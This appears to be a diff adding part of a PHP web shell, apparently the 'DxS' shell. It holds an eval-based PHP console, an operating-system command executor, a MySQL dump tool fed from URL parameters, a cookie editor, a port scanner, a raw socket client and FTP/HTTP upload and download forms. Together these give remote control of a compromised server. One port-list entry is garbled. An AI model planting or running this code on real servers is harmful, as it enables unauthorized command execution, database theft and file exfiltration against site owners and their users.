+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');
+	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{
+		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';
+
+	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{
+		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{
+		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{
+			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{
+				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{
+			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{
+				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{
+	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))
+		{
+		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);
